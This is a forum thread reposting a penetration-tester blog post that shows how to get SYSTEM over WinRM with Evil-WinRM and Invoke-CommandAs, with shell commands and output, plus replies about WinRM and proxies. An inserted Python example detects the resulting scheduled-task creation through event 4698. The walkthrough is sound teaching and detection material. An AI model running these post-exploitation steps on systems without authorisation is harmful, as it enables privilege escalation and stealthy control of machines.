Nytro
Posted September 14, 2020

Run as SYSTEM using Evil-WinRM

This is a quick blog post on how to elevate to SYSTEM without the need for PSEXEC when you are using PowerShell, or more specifically in this case, PowerShell Remoting (WinRM).

First off, let me introduce my tool of choice here. It's Evil-WinRM. I spoke about it in the Practical Exploitation video here: https://www.youtube.com/watch?v=tVgJ-9FJKxE, so I won't go too far in depth. It's essentially the only WinRM tool that I've found to work well in a non-Windows native situation (also you can proxy it through proxychains which is AWESOME!!).

Anyways. I want to document how to run commands as SYSTEM without the use of PSEXEC. I found this technique on a 4sysops blog post called Running PowerShell Remotely As System with Invoke-CommandAs. Side-note: you should definitely bookmark their blog, it's great.

Invoke-CommandAs is not a native function of PowerShell, so you need to download it from the original author's Github repo: https://github.com/mkellerman/Invoke-CommandAs

For our uses all you need to do is get these two particular files:
https://github.com/mkellerman/Invoke-CommandAs/blob/master/Invoke-CommandAs/Public/Invoke-CommandAs.ps1
https://github.com/mkellerman/Invoke-CommandAs/blob/master/Invoke-CommandAs/Private/Invoke-ScheduledTask.ps1

Here you can see me putting those two files into a scripts directory I made inside of the Evil-WinRM folder. (git clone https://github.com/Hackplayers/evil-winrm + bundle install)

root@attacker:~/evil-winrm/scripts# ls
Invoke-CommandAs.ps1
root@attacker:~/evil-winrm/scripts# wget https://raw.githubusercontent.com/mkellerman/Invoke-CommandAs/master/Invoke-CommandAs/Private/Invoke-
--2020-09-13 20:17:56-- https://raw.githubusercontent.com/mkellerman/Invoke-CommandAs/master/Invoke-CommandAs/Private/Invoke-ScheduledTask.ps
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.200.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.200.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10009 (9.8K) [text/plain]
Saving to: 'Invoke-ScheduledTask.ps1'

Invoke-ScheduledTask.ps1 100%[===========================================================================================

2020-09-13 20:17:56 (5.37 MB/s) - 'Invoke-ScheduledTask.ps1' saved [10009/10009]

Once that's ready, I run Evil-WinRM with the -s flag and specify the scripts directory I put the two files in.

root@attacker:~/evil-winrm# ruby evil-winrm.rb -i 192.168.80.10 -u uberuser -s scripts/
Enter Password:

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\uberuser\Documents>

Once I have the shell I load each of the scripts by typing out their file names (tab complete should work):

*Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-ScheduledTask.ps1
*Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-CommandAs.ps1

Once they are loaded you need to run the menu command to load the functions into memory on the attacker's side. I haven't looked at the code enough to know exactly why this is needed, but it doesn't seem to work if you don't.

*Evil-WinRM* PS C:\Users\uberuser\Documents> menu

[Evil-WinRM ASCII-art banner]

By: CyberVaca, OscarAkaElvis, Laox @Hackplayers

[+] Bypass-4MSI
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Invoke-CommandAs
[+] Invoke-ScheduledTask

As we can see both of the needed functions are loaded and we can finally issue our commands as SYSTEM with the -AsSystem flag and the command being whoami:

*Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-CommandAs -ScriptBlock {whoami} -AsSystem
nt authority\system
*Evil-WinRM* PS C:\Users\uberuser\Documents>

Source: https://malicious.link/post/2020/run-as-system-using-evil-winrm/
biosh3ll
Posted September 15, 2020

Isn't this pointless? I thought you can't get out to the Internet with SYSTEM processes (the proxy doesn't authenticate you). The process will use DefaultNetworkCredentials, which are the process's own credentials.
Nytro (Author)
Posted September 15, 2020

It's not pointless, it's an alternative to psexec (which is detectable). WinRM is used by sysadmins (officially) to manage Windows systems using PowerShell, the way SSH and bash are used on Linux. What it actually does is roughly the same thing: it creates a scheduled task through which whatever you want runs as SYSTEM. Of course, it requires the necessary privileges.

You don't "get out to the Internet with system processes" here - and there is no such limitation anyway. In addition, at the operating system level a global proxy can be set, but applications (of any kind, whether they run as a regular user or as services like SYSTEM) are not obliged to honour it. There are Windows functions that honour it automatically, but if an application manually creates a socket and connects it to an IP on the Internet, it will not honour that setting.
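Nytro's reply above explains that Invoke-CommandAs -AsSystem works by registering a scheduled task that runs as SYSTEM. As an added example (not code from the thread, the blog post or the Invoke-CommandAs project), the Python below shows how a defender can surface exactly that pattern in Windows Security event 4698 (A scheduled task was created): a non-SYSTEM account registering a task whose principal is SYSTEM. It assumes the events have already been exported as dict records carrying the 4698 EventData fields, that the "Audit Other Object Access Events" subcategory is enabled so 4698 is logged at all, and the sample events are constructed.

```python
import xml.etree.ElementTree as ET

# Namespace of the Task Scheduler XML carried in the TaskContent field of event 4698.
TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
SYSTEM_SID = "S-1-5-18"
SYSTEM_NAMES = {"system", "nt authority\\system", "localsystem"}

def task_principal(task_xml):
    """Return the UserId (SID or account name) the task is configured to run as, or None."""
    root = ET.fromstring(task_xml)
    uid = root.find(f"{TASK_NS}Principals/{TASK_NS}Principal/{TASK_NS}UserId")
    return uid.text.strip() if uid is not None and uid.text else None

def runs_as_system(principal):
    # SYSTEM may appear as its SID or as one of its account-name spellings.
    return principal is not None and (principal.upper() == SYSTEM_SID or principal.lower() in SYSTEM_NAMES)

def suspicious_system_task(event):
    """True when a non-SYSTEM account registered a task whose principal is SYSTEM."""
    if event.get("EventID") != 4698:
        return False
    if event["SubjectUserSid"] == SYSTEM_SID:
        return False  # SYSTEM registering its own maintenance tasks is normal noise
    return runs_as_system(task_principal(event["TaskContent"]))

def find_suspicious(events):
    """Return (creator, task name) pairs worth an alert."""
    return [(e["SubjectUserName"], e["TaskName"]) for e in events if suspicious_system_task(e)]

def _task_xml(user_id):
    # Minimal task definition in the real schema; only the parts the detection needs.
    return ('<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
            f'<Principals><Principal id="Author"><UserId>{user_id}</UserId>'
            '<RunLevel>HighestAvailable</RunLevel></Principal></Principals>'
            '<Actions><Exec><Command>powershell.exe</Command></Exec></Actions></Task>')

# Constructed sample events (not real log data), shaped like the EventData of 4698.
SAMPLE_EVENTS = [
    {"EventID": 4698, "SubjectUserSid": "S-1-5-21-1-2-3-1001", "SubjectUserName": "uberuser",
     "TaskName": "\\Example-Task", "TaskContent": _task_xml("S-1-5-18")},
    {"EventID": 4698, "SubjectUserSid": "S-1-5-18", "SubjectUserName": "SYSTEM",
     "TaskName": "\\Microsoft\\Windows\\ExampleMaintenance", "TaskContent": _task_xml("S-1-5-18")},
    {"EventID": 4698, "SubjectUserSid": "S-1-5-21-1-2-3-1001", "SubjectUserName": "uberuser",
     "TaskName": "\\Backup", "TaskContent": _task_xml("CORP\\uberuser")},
]

if __name__ == "__main__":
    for user, task in find_suspicious(SAMPLE_EVENTS):
        print(f"ALERT: {user} registered task {task} to run as SYSTEM")
```

Correlating the SubjectLogonId of a hit with its 4624 logon event tells you whether the task was registered from a remote (WinRM) session or an interactive one.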
biosh3ll
Posted September 15, 2020

Well, and in the HTTP context, when you have a web proxy in front? Does this WinRM thing still apply?
Nytro (Author)
Posted September 15, 2020

WinRM is a service that can run on pretty much all Windows versions with PowerShell. It uses HTTP (data is not sent in clear text, it just uses HTTP as the protocol) on port 5985 and HTTPS on port 5986. This service listens on those ports and sysadmins can connect, log in and run PowerShell scripts/commands. The web proxy is used when you want to connect from a PC to somewhere on the Internet (and as I said, it can be bypassed by design if it's the one set in Windows).

Sysadmin -- WinRM --> PC they need to work on -- HTTP via web proxy --> the sites that PC's user visits